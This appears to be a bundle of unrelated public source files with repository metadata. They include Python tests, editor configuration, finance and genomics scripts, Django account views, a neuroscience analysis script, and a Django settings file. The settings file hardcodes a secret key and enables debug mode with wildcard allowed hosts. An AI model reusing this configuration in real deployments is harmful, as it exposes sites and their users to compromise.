Python
| false
| false
| 968
|
py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for clif.testing.python.imported_methods."""
import unittest
from clif.testing.python import imported_methods
class InheritedConstructorsTest(unittest.TestCase):
def testInheritedConstructor(self):
d = imported_methods.Derived(12345)
self.assertEqual(d.GetA(), 12345)
self.assertEqual(d.GetAWithOffset(43210), 55555)
if __name__ == '__main__':
unittest.main()
|
[
"mrovner@google.com"
] |
mrovner@google.com
|
2180fbd40a9cda6cf6e7180218f7f525f2c351ce
|
664269ec1346b69b1af11d041d5352921ebef060
|
/sample-apps/rds/sample-app/src/pymysql/_compat.py
|
252789ec4460a3ee383f18f8af26e42ba82b666d
|
[
"Apache-2.0"
] |
permissive
|
awslabs/aws-servicebroker
|
0f288d4da0201a85e99f27bf7d95cc84d30d2f93
|
b28f42ad1e5861fd3009a10ad4bd511a384d3943
|
refs/heads/main
| 2023-08-30T01:09:05.351854
| 2023-07-06T18:09:22
| 2023-07-06T18:09:22
| 125,404,208
| 468
| 165
|
Apache-2.0
| 2023-08-30T14:07:12
| 2018-03-15T17:36:28
|
Python
|
UTF-8
|
Python
| false
| false
| 481
|
py
|
import sys
PY2 = sys.version_info[0] == 2
PYPY = hasattr(sys, 'pypy_translation_info')
JYTHON = sys.platform.startswith('java')
IRONPYTHON = sys.platform == 'cli'
CPYTHON = not PYPY and not JYTHON and not IRONPYTHON
if PY2:
import __builtin__
range_type = xrange
text_type = unicode
long_type = long
str_type = basestring
unichr = __builtin__.unichr
else:
range_type = range
text_type = str
long_type = int
str_type = str
unichr = chr
|
[
"jmmccon@amazon.com"
] |
jmmccon@amazon.com
|
c292ededc8a2ccc3333ba607b656b58dd2f5efe0
|
3def38a9c4e148fbec899d8e6115cdefb61ceead
|
/.ycm_extra_conf.py
|
6cbf0f0a59f53d4b04046f1885363df2db3fdae4
|
[] |
no_license
|
shinew/configs
|
a2a7e8eca6dc25c5f5d097d6e4d11d43f3c2adff
|
d910c8935c0d302dd80e116c1740b32e22e1b7ce
|
refs/heads/master
| 2021-03-27T15:50:50.334607
| 2018-03-31T00:19:30
| 2018-03-31T00:19:30
| 55,921,635
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,562
|
py
|
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
#'-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++14',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
# Here are the system includes, found by: 'echo | clang -v -E -x c++ -'
'-isystem',
'/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1',
'-isystem',
'/usr/local/include',
'-isystem',
'/Library/Developer/CommandLineTools/usr/lib/clang/9.1.0/include',
'-isystem',
'/Library/Developer/CommandLineTools/usr/include',
'-isystem',
'/usr/include',
#'-isystem',
#'/usr/local/lib',
# '-isystem',
# os.path.join(os.environ['GTEST_DIR'], 'include'),
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
|
[
"shine.sw.wang@gmail.com"
] |
shine.sw.wang@gmail.com
|
236c4133d1ff95f11a4ce5df03a7b6a671f566ba
|
1ebf1d957e81555baade65fdb57041b914736f3b
|
/com/ddm/tradingbot/data/provider/yFinanceProvider.py
|
692210494e27557bbe045782244c9be7186fb79e
|
[] |
no_license
|
damenv/trabot
|
a777204d3459b86e01742db3d59f7ae2be43a283
|
08633722ba1a4a7fbbca162af9308f596196824f
|
refs/heads/master
| 2022-12-17T21:09:21.725391
| 2020-09-19T18:31:16
| 2020-09-19T18:31:16
| 290,363,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,069
|
py
|
"""
Using yfinance library to obtain the stock data
"""
import datetime as dt
import yfinance as yf
import pandas as pd
from com.ddm.tradingbot.data.provider.providerBase import providerBase
class yFinanceProvider(providerBase):
ticker = ""
valor = "yyyiii"
def __init__(self, ticker):
self.ticker = ticker
def getOHLCV(self, start_date, end_date) -> dict:
return yf.download(self.ticker, start_date, end_date)
def getOHLCV(self, ticker_list, start_date, end_date) -> dict:
ohlcv_data = {}
for ticker in ticker_list:
ohlcv_data[ticker] = yf.download(ticker, start_date, end_date)
def getClosePrice(self, start_date, end_date, interval) -> dict:
return yf.download(self.ticker, start_date, end_date)["Adj Close"]
def getClosePrice_list(self, ticker_list: list, start_date, end_date) -> dict:
close_price = pd.DataFrame()
for ticker in ticker_list:
close_price[ticker] = yf.download(ticker, start_date, end_date)["Adj Close"]
return close_price
|
[
"damen1105@gmail.com"
] |
damen1105@gmail.com
|
bf23ff1ffbc40cacf8ba103e621f8ad641cd675f
|
1996a67d2a281706e9c141797e1813fc1b3612a7
|
/python/DNaseOverlap.py
|
b09fff46d97b9d18962c390ab47500ba50aaaf75
|
[] |
no_license
|
pjshort/SingletonMetric
|
91076a9976cc45a4ddf5f0750b20b7c46b7f1f5a
|
dc9af500c928b9d5b94aa75bc4b609e3feffe956
|
refs/heads/master
| 2021-01-10T06:20:49.350579
| 2016-03-07T11:12:25
| 2016-03-07T11:12:25
| 49,203,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
import pysam
import argparse
import sys
import os
def get_options():
""" get the command line options
"""
parser = argparse.ArgumentParser(description="Get CADD scores for set of alleles.")
parser.add_argument("--variants", default="/path/to/input/variants",
help="location of variants in chr\tpos\tref\talt (minimal vcf) format")
parser.add_argument("--variants_out", default=sys.stdout,
help="path to send the list of variants with DNASE overlap binary values.")
parser.add_argument("--roadmap_epigenome_ids", default = ["E002", "E010", "E053", "E072", "E081", "E082", "E083"],
help = "list of roadmap epigenome project ideas in form E###.")
args = parser.parse_args()
return args
def get_variants(variants_path):
chr = []
pos = []
ref = []
alt = []
with open(variants_path, "r") as myvariants:
myvariants.readline() # skip the header
for line in myvariants:
line = line.split("\t")
chr.append(line[0])
pos.append(int(line[1]))
ref.append(line[2])
alt.append(line[3].rstrip())
return chr, pos, ref, alt
def check_dnase_overlap(chr, pos, ref, alt, id, TABIX_DIR):
tabixfile = pysam.Tabixfile(TABIX_DIR + "regions_enh_%s.bed.gz" % id) # e.g. E081 is male fetal brain
overlap = []
for c, p, r, a in zip(chr, pos, ref, alt):
t = tabixfile.fetch("chr" + c, p-1, p)
if len(list(t)) > 0: # overlaps entry
overlap.append(1)
else: # no overlap
overlap.append(0)
return overlap
if __name__ == "__main__":
args = get_options()
chr, pos, ref, alt = get_variants(args.variants)
TABIX_DIR = "/lustre/scratch113/projects/ddd/users/ps14/REP/"
try:
id_list = [line.rstrip() for line in open(args.roadmap_epigenome_ids)]
except NameError:
pass # take default (brain and brain developmental tissues)
overlap_list = []
i = 0
for id in id_list:
if not os.path.isfile("/lustre/scratch113/projects/ddd/users/ps14/REP/regions_enh_%s.bed.gz" % id):
print "No DNase Peaks for %s. Skipping and moving to the next tissue." % id
id_list.pop(i)
continue
print "Intersecting parental alleles with %s DNase peaks." % id
overlap = check_dnase_overlap(chr, pos, ref, alt, id, TABIX_DIR)
overlap_list.append(overlap)
i += 1
myvariants = open(args.variants, "r")
variant_header = myvariants.readline().rstrip()
variants = myvariants.readlines()
#lines = [variants] + overlap_list
myfile = open(args.variants_out, 'w')
# write header
header = variant_header + "\t" + "\t".join(id_list) + "\n"
myfile.write(header)
# write lines
i = 0
for overlaps in zip(*overlap_list): # the * unpacks the list of lists
var = variants[i].rstrip()
myfile.write(var + "\t" + "\t".join(str(o) for o in overlaps) + "\n")
i += 1
print 'Finished!'
|
[
"pjshort42@gmail.com"
] |
pjshort42@gmail.com
|
95abb0d40ff2d7df34f470a31b6ed10e507c4cec
|
330e77e53d580a73e883e705b6bc8caca3456194
|
/accounts/views.py
|
611d57e964b7819e514d81af3de9be2323a30ba3
|
[] |
no_license
|
Chandan-97/CyTin
|
d2995970eade13ec46c7874ecb5c2922328e5367
|
e8612124a52a307a44c6833ddefe02b06a50c919
|
refs/heads/master
| 2020-03-10T11:39:18.188372
| 2018-04-13T04:26:01
| 2018-04-13T04:26:01
| 129,360,932
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,451
|
py
|
from django.shortcuts import render, redirect, HttpResponse
from django.contrib.auth import *
from .form import LoginForm, RegisterForm, RequestnewForm
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from .tokens import account_activation_token
import sendgrid
import os
from sendgrid.helpers.mail import *
# Create your views here.
def login_view(request):
form = LoginForm(request.POST or None)
# Getting Values from form and validation
if form.is_valid(): # clean() from forms.py is called
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
# print(username)
# print(password)
#user is available
user = authenticate(username=username, password=password)
login(request, user)
print (request.user.is_authenticated())
return redirect("/")
# Send it to render into page "login_form.html"
return render(request, "login_form.html", {"form" : form})
def logout_view(request):
logout(request)
print(request.user.is_authenticated())
return render(request, "login_form.html", {})
def requestnew_view(request):
user = request.user
if(user.is_authenticated() == False):
return redirect("/login")
form = RequestnewForm(request.POST or None)
if form.is_valid():
Software = form.save(commit=False)
Software.software = form.cleaned_data.get("Software")
if(form.cleaned_data.get("Version")):
Software.version = form.cleaned_data.get("Version")
if(form.cleaned_data.get("Comment")):
Software.comment = form.cleaned_data.get("Comment")
Software.save()
return render(request, "requestnew_form.html", {"form" : form})
def register_view(request):
print(request.user.is_authenticated())
form = RegisterForm(request.POST or None)
if form.is_valid():
user = form.save(commit=False)
password = form.cleaned_data.get("password")
user.set_password(password)
user.is_active = False
user.save()
current_site = get_current_site(request)
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
from_email = Email("iamoneofmykind@gmail.com")
to_email = Email(form.cleaned_data.get("email"))
subject = "Activate your CyTin account"
content = Content("text/plain", account_activation_token.make_token(user))
mail = Mail(from_email, subject, to_email, content)
response = sg.client.mail.send.post(request_body=mail.get())
return HttpResponse('Please confirm your email address to complete the registration')
else:
form = RegisterForm()
return render(request, "login_form.html", {"form":form})
# new_user = authenticate(username=user.username, password=user.password)
# login(request, user)
# print(request.user.is_authenticated())
# return redirect("/")
# return render(request, "login_form.html", {"form" : form})
def activate(request, uidb64, token):
try:
uid = force_text(urlsafe_base64_decode(uidb64))
user = User.objects.get(pk=uid)
except(TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and account_activation_token.check_token(user, token):
user.is_active = True
user.save()
login(request, user)
return HttpResponse('Thank you for your email confirmation. Now you can login your account.')
else:
return HttpResponse('Activation link is invalid!')
|
[
"cp564738@gmail.com"
] |
cp564738@gmail.com
|
81f8e0ee87794f469abaa56ecaa9a35b05cecdf7
|
33d9426e8450cc0c9a0e1f377383c066a2e9b7f0
|
/Proceso_De_Todos_los_Datos.py
|
25c788d53679b366f83c9b579c2297d6d3ddf05b
|
[] |
no_license
|
tomasgarcianeuro/Funtions_Neuro
|
33d5ffd08b6780357e692a70ebaad81c80de9c96
|
39ce501bf9a68ea96249a8f41c7d2f077a13898e
|
refs/heads/main
| 2023-01-19T20:53:03.778169
| 2020-10-26T14:47:56
| 2020-10-26T14:47:56
| 307,396,435
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,927
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import pickle
from scipy.ndimage import gaussian_filter as gauss_fil
from os import listdir
# =============================================================================
# NO CORRER_ USADO COMO PLANTILLA PARA DEMOSTRACION A SUB DIR SEGUN CLAUSULA map(lambda arg: arg/2, [12, 12 ,12])
# SUB DIR SE REHUSA A CREER EN EL DEBUGGEAR ()
# =============================================================================
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Inicializaciones fundamentales """""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""INICIALIZANDO VECTOR TEMPORAL"""
Eje_Temporal=np.zeros(Diccionario["Posicion"].T.shape[1])
for i in range(Eje_Temporal.shape[0]):
Eje_Temporal[i]=400*(i+1)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Funciones """""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""Division de vector disparo en cluster"""
def Division_luz_oscuridad(clu,Tiempo_Luz_oscuridad):
"""La funcion logra separar, a pártir de una columna clu (donde se encuentran los tiempos de los picos para un cluster), en dos columnas (dentro
de un diccionario cada una con los tiempos en los que se disparo el cluster, pero ya discriminados en luz y oscuridad"""
inicio=0 #Tiempo en que inicia el periodo de luz u oscuridad
final=0 # Tiempo en que finaliza el periodo de luz u oscuridad
cluster_aux={}
cluster_aux['Luz']={}
cluster_aux['Oscuridad']={}
luz=0 #variable para individualizar los l1,l2,l3,l4 etc.
oscuridad=0
inicio=float(Tiempo_Luz_oscuridad[0][2]) #Determino donde inica el evento
for i in range(Tiempo_Luz_oscuridad.shape[0]):
final=float(Tiempo_Luz_oscuridad[i][3]) #Donde finaliza el evento
if Tiempo_Luz_oscuridad[i][1][0]=="l": #Determino si estamos en luz "l" y oscuridad "d"
tipo_luz=str(Tiempo_Luz_oscuridad[i][1][:2])+".{}"
cluster_aux["Luz"][tipo_luz.format(str(luz))]=clu[np.argmax(clu>inicio):np.argmin(clu<final)] #Agrego al cluster correspondiente los picos correspondienes
inicio=final;luz+=1 # al periodo de luz
else:
tipo_oscuridad=str(Tiempo_Luz_oscuridad[i][1][:2])+".{}"
cluster_aux["Oscuridad"][tipo_oscuridad.format(str(oscuridad))]=clu[np.argmax(clu>inicio):np.argmin(clu<final)] #Agrego al cluster correspondiente los picos correspondienes
inicio=final;oscuridad+=1
return cluster_aux
def Division_clu_(Cluster,tiempo):
""""Funcion que crea un diccionario con el tiempo de disparo de cada cluster """
num_clu=int(Cluster[0]) #Numero de clusters
Cluster=np.delete(Cluster,0) #Elimino la primera fila que indica el numero de cluster
Cluster=Cluster.reshape([Cluster.shape[0] ,1])
tiempo=tiempo.reshape([ tiempo.shape[0] ,1])
Cluster=np.append(Cluster,tiempo,1)
CLUSTERS={}
for i in range(num_clu+1): #Creeo el diccionario de los clusters
Nombre_Vector="Cluster Numero {}"
CLUSTERS[Nombre_Vector.format(i)]=np.array([])
#LLeno los culster
for i in range(Cluster.shape[0]):
Num_clu=Cluster[i][0] #Asigno a Num_clu el identificador de cluster que se activo
Num_time=Cluster[i][1] #Asigno a Num_time el tiempo de cluster que se activo referido a Num_clu
Nombre_Vector="Cluster Numero {}"
CLUSTERS[Nombre_Vector.format(int(Num_clu))]=np.append(CLUSTERS[Nombre_Vector.format(int(Num_clu))],Num_time)
return CLUSTERS
def Division_global(Cluster,tiempo,tiempo_l_o):
"""La funcion se apoya en las dos funciones anteriores (Division_clu_ y Division_luz_oscuridad) para devolver un diccionario, que a su vez contiene
otros diccionarios en la cual tenemos una organizacion de la sigiente manera:
Dentro del diccionario principal tenemos n diccionarios (siendo n el numero de cluster)
Dentro de cada uno de esos diccionarios tenemos dos diccionarios más, cada uno con los valores temporales en los que se disparo dicho cluster
cuando el sujeto se encontraba en luz u oscuridad (dependiendo del diccionario al que pertenece)"""
num_clu=int(Cluster[0])
Cluster_Principal=Division_clu_(Cluster, tiempo) #Creo el diccionario principal
clu_aux={}
for i in range(num_clu):
clu_aux=Division_luz_oscuridad(Cluster_Principal["Cluster Numero {}".format(i+1)],tiempo_l_o)
Cluster_Principal["Cluster Numero {}".format(i+1)]=clu_aux
return Cluster_Principal
def Cargar(name):
"""Cargar archivos"""
with open (name, "rb") as hand:
dic=pickle.load(hand)
return dic
def Guardar(name,objecto):
with open (name, "wb") as hand:
dic=pickle.dump(objecto,hand)
"""Cálculo de tasa de disparo, etc."""
def Disparos(clu,time):
"""Funcion que crea un vector donde cada elemento es un numero entero que representa el lugar donde estaba el SUJETO
cuando se registro el disparo. Esto es, los elementos del vector representan el INDICE
en el Eje_Temporal en el que sucedio el disparo."""
posicion_disparo=np.array([])
j=0
for i in range(clu.shape[0]):
Condicion=True
while Condicion:
if (clu[i]>=time[j] and clu[i]<time[j+1]):
posicion_disparo=np.insert(posicion_disparo,posicion_disparo.shape[0],j)
break
j+=1
return posicion_disparo
def Cuentas(disp_clu,posx,posy,bins):
"""Funcion que determina el número total de disparos den un determinado lugar fisico. Se representa por medio de
una matriz"""
X=list(posx)
Y=list(posy)
Tasa_disparo=np.zeros([int(900/bins),int(900/bins)])
for i in range(disp_clu.shape[0]):
Tasa_disparo[int(Y[int(disp_clu[i])]/bins)][int(X[int(disp_clu[i])]/bins)]+=1
return Tasa_disparo
def Tiempo(posx,posy,bins):
"""Funcion que determina el tiempo total que el animal paso en un determinado lugar fisico. Se representa por medio
de una matriz"""
X=list(posx)
Y=list(posy)
Tasa_disparo=np.zeros([int(900/bins),int(900/bins)])
for i in range(posx.shape[0]):
if (Y[i]!=-1 or X[i]!=-1):
Tasa_disparo[int(Y[i]/bins)][int(X[i]/bins)]+=400
return Tasa_disparo #Se divide por 20k para obtener la matriz expresada en segundos
def Tiempo_2(Dicc,bins,type_fuente):
"""Funcion que determina el tiempo total que el animal paso en un determinado lugar fisico en unos determinados
intervalos. Se representa por medio de una matriz"""
Tasa_disparo=np.zeros([int(900/bins),int(900/bins)])
for i in range(60):
if Dicc["Light_Trials"][i][1]==type_fuente:
X=list(Dicc["Posicion"].T[0][int(int(Dicc["Light_Trials"][i][2])/400):int(int(Dicc["Light_Trials"][i][3])/400)+1])
Y=list(Dicc["Posicion"].T[1][int(int(Dicc["Light_Trials"][i][2])/400):int(int(Dicc["Light_Trials"][i][3])/400)+1])
for i in range(len(X)):
if (Y[i]!=-1 or X[i]!=-1):
Tasa_disparo[int(Y[i]/bins)][int(X[i]/bins)]+=400
return Tasa_disparo/20000 #Se divide por 20k para obtener la matriz expresada en segundos
def Tasa_disparo(cuenta,tiempo):
"""Funcion que determina la tasa de disparo"""
#La variable tiempo es el Eje_temporal
tasa_verdadera=np.zeros(cuenta.shape)
for i in range(cuenta.shape[0]):
for j in range(cuenta.shape[0]):
if tiempo[i][j]!=0:
tasa_verdadera[i][j]=cuenta[i][j]/tiempo[i][j]
return tasa_verdadera
def Cluster_type_light_(Diccionario,bins,luz_oscuridad,type_fuente,num_clu,Eje_Temporal):
Disparos_clu=np.array([])
fuente="{}{}".format(str(type_fuente),".{}")
for i in range(30):
if fuente.format(i) in Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad]:
Disparos_clu=np.concatenate((Disparos_clu,Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad][fuente.format(i)]))
Shots_clu=Disparos(Disparos_clu, Eje_Temporal) #Determino los disparos
Cuenta=Cuentas(Shots_clu,Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], bins)
Time=Tiempo_2(Diccionario, bins,type_fuente) #Tiempo del individuo en una determinada posicion
Tasa_de_disparo=Tasa_disparo(Cuenta, Time)
Imagen_Filtrada=gauss_fil(Tasa_de_disparo, 3)
plt.imshow(Imagen_Filtrada,cmap="jet")
# plt.imshow(Tasa_de_disparo,cmap="jet")
def Generador_Dicc(Datos_brutos):
"""Funcion que genera los diccionarios a utilizar. Dicha funcion recibe como entrada a los nombres de los experimentos"""
for k in Datos_brutos:
datos={}
Nombre_animales="/home/tomasg/Escritorio/Neuro/data_perez_escobar_2016/circular_arena/{}" #Debo indicar el nombre del animal
List_ses=listdir(Nombre_animales.format(k))
Sessiones=[] #Creo la lista de sessiones
for i in List_ses:
Ses=i[i.find("-")+1:i.find("2015")]
Sessiones.append(Ses)
Nombre2="/home/tomasg/Escritorio/Neuro/data_perez_escobar_2016/circular_arena/{}/{}-{}2015-0108/{}-{}2015-0108.{}"
Nombre1="{}-{}2015-0108".format(k,"{}")
Nombre_clu=Nombre2.format(k,k,"{}",k,"{}","clu")
Nombre_res=Nombre2.format(k,k,"{}",k,"{}","res")
Nombre_light=Nombre2.format(k,k,"{}",k,"{}","light_trials_intervals")
Nombre_whl=Nombre2.format(k,k,"{}",k,"{}","whl")
#En el siguiente apartado cargo los datos principales para refinar los datos
for i in Sessiones:
datos[Nombre1.format(i)]={"Clu":np.loadtxt(Nombre_clu.format(i,i)),"Res":np.loadtxt(Nombre_res.format(i,i)),"Light":np.loadtxt(Nombre_light.format(i,i),dtype=str)}
"""Cargo los archivos"""
#Abajo indico la ruta y el nombre con el que se guardaran los archivos
Nombre_Guardar="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/{}/Diccionario_{}"
"""Refino y guardo los datos"""
Dic={}
for l in Sessiones:
Dic=Division_global(datos[Nombre1.format(l)]["Clu"], datos[Nombre1.format(l)]["Res"], datos[Nombre1.format(l)]["Light"])
Dic["Posicion"]=np.loadtxt(Nombre_whl.format(l,l)) #Agrego al diccionario los datos de la posicion
Dic["Light_Trials"]=datos[Nombre1.format(l,l)]["Light"] #Agrego al diccionario los datos de intervalos de luz y oscuridad utilizados
Guardar(Nombre_Guardar.format(k,l),Dic) # l es la session donde se guarda y k el codigo del animal
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Genero los diccionarios principales"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Animal=['jp2142', 'jp21414']
Generador_Dicc(Animal)
Nombre1="jp19844-{}2015-0108" #Codigo principal que hace referencia al nombre de la rata
jp19844={}
Sessiones=["0908","1108","1208","1308","2008","2608"] #Fechas de las sessiones de grabacion
Nombre_clu="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.clu".format(Nombre1)
Nombre_res="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.res".format(Nombre1)
Nombre_light="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.light_trials_intervals".format(Nombre1)
Nombre_whl="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.whl".format(Nombre1)
#En el siguiente apartado cargo los datos principales para refinar los datos
for i in Sessiones:
jp19844[Nombre1.format(i)]={"Clu":np.loadtxt(Nombre_clu.format(str(i))),"Res":np.loadtxt(Nombre_res.format(str(i))),"Light":np.loadtxt(Nombre_light.format(str(i)),dtype=str)}
"""Cargo los archivos"""
#Abajo indico la ruta y el nombre con el que se guardaran los archivos
Nombre_Guardar="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/jp19844/Diccionario_{}"
"""Refino y guardo los datos"""
Dic={}
for l in Sessiones:
Dic=Division_global(jp19844[Nombre1.format(l)]["Clu"], jp19844[Nombre1.format(l)]["Res"], jp19844[Nombre1.format(l)]["Light"])
Dic["Posicion"]=np.loadtxt(Nombre_whl.format(l)) #Agrego al diccionario los datos de la posicion
Dic["Light_Trials"]=jp19844[Nombre1.format(l)]["Light"] #Agrego al diccionario los datos de intervalos de luz y oscuridad utilizados
Guardar(Nombre_Guardar.format(l),Dic)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Calculo de tasa de disparo"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""En esta parte del codigo determino la tasa de disparo de la siguiente manera:
1) Determino una matriz con los disparos para UN cluster
la matriz es una representacion cuadricular del espacio. Cada elemento de la matriz representa una porcion del espacio físico por donde el animal se mueve
2) Determino una matriz del mismo tamaño con el tiempo que estuvo el animal en dicho lugar físico
3) Determino, con una division elemento a elemento, la tasa de disparo del animal en dicho lugar
4) A la matriz resultante Tasa_de_disparo le aplico un filtro gaussiano para suavizar la imagen
5) Grafico el resultado """
#Antes que nada se cargan los elementos a aplicar el proceso antes descripto
# =============================================================================
# Modo MANUAL, modo de ejemplo solicitado por Sub. Dir
# =============================================================================
Name="jp5519"
Datos_Animal="{}/Diccionario_{}".format(Name,"0610")
Nombre_Carga="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/{}".format(Datos_Animal)
Diccionario=Cargar(Nombre_Carga) #Cargo el diccionario generado anteriormente
"""CONCATENO LOS INTERVALOS EN LOS QUE SE UTILIZO LA MISMA LUZ l2 O l4"""
Disparos_clu=np.array([])
for i in range(30):
#if fuente.format(i) in Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad]:
Disparos_clu=np.concatenate((Disparos_clu,Diccionario["Cluster Numero 6"]["Luz"]["l2.{}".format(i)]))
"""PROCESO LOS DATOS PARA LA MISMA LUZ l2 O l4"""
Shots_clu=Disparos(Disparos_clu, Eje_Temporal) #Determino los disparos
Cuenta=Cuentas(Shots_clu,Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], 25.0001)
Time=Tiempo_2(Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], 25.0001) #Tiempo del individuo en una determinada posicion
Tasa_de_disparo=Tasa_disparo(Cuenta, Time)
Imagen_Filtrada=gauss_fil(Tasa_de_disparo, 1)
plt.imshow(Imagen_Filtrada,cmap="jet")
plt.imshow(Tasa_de_disparo,cmap="jet")
#plt.imshow(Tasa_de_disparo,cmap="jet",vmin=0,vmax=1)
#plt.imshow(Imagen_Filtrada,cmap="jet",vmin=0,vmax=1)
|
[
"noreply@github.com"
] |
noreply@github.com
|
758db4b99719e367115109a9db0ff573624e2909
|
928e46c6f6553fe285645c3a61fb8b6ec1c27020
|
/website/website/settings.py
|
ff58740173b0a59efcb0ff5e9dbd86e52d7ae605
|
[] |
no_license
|
aureatemandala/The-Pavilion-of-Dreams
|
06ab1be2490639cd6f16022e8d76e449f290632f
|
7e3dcbabfc304500750273fb5cca5392d1416158
|
refs/heads/master
| 2022-12-31T10:41:36.345352
| 2020-10-25T13:51:38
| 2020-10-25T13:51:38
| 272,225,840
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,460
|
py
|
"""
Django settings for website project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'hws4725ktt-!ad#or+tw!h9jk0*gf9u45#07qb_id_56!@9lmy'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
